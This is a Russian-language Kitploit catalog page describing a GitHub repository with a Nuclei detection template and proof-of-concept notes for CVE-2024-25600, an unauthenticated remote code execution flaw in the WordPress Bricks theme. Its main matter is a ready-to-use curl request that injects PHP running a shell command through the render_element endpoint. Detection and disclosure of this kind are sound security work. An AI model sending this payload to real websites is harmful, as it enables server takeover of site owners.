Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25600_Nuclei-Template — Шаблон Nuclei и информация о POC для CVE-2024-25600 | Kitploit
Инструменты/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

Шаблон Nuclei и информация о POC для CVE-2024-25600

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3172 лет назадПроверено Kitploit

CVE-2024-25600_Nuclei-Template

Шаблон Nuclei и информация о PoC для CVE-2024-25600

Описание 📝

Тема Bricks для WordPress уязвима к удаленному выполнению кода во всех версиях до 1.9.6 включительно. Это позволяет неаутентифицированным злоумышленникам выполнять код на сервере. Этот шаблон 🛠️ предназначен для обнаружения уязвимости CVE-2024-25600 🕳️, найденной в плагине Bricks Builder для WordPress, с помощью nuclei. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на атакованных веб-сайтах 💻.

Доказательство концепции (PoC) 📝

Полный PoC (автоматический) доступен по адресу https://github.com/chocapikk/CVE-2024-25600.

Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Замените [HOST] на целевой веб-сайт, а [NONCE] на значение nonce, полученное с сайта.

Ссылка 📖

Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному раскрытию на Snicco.io.

Скачать инструмент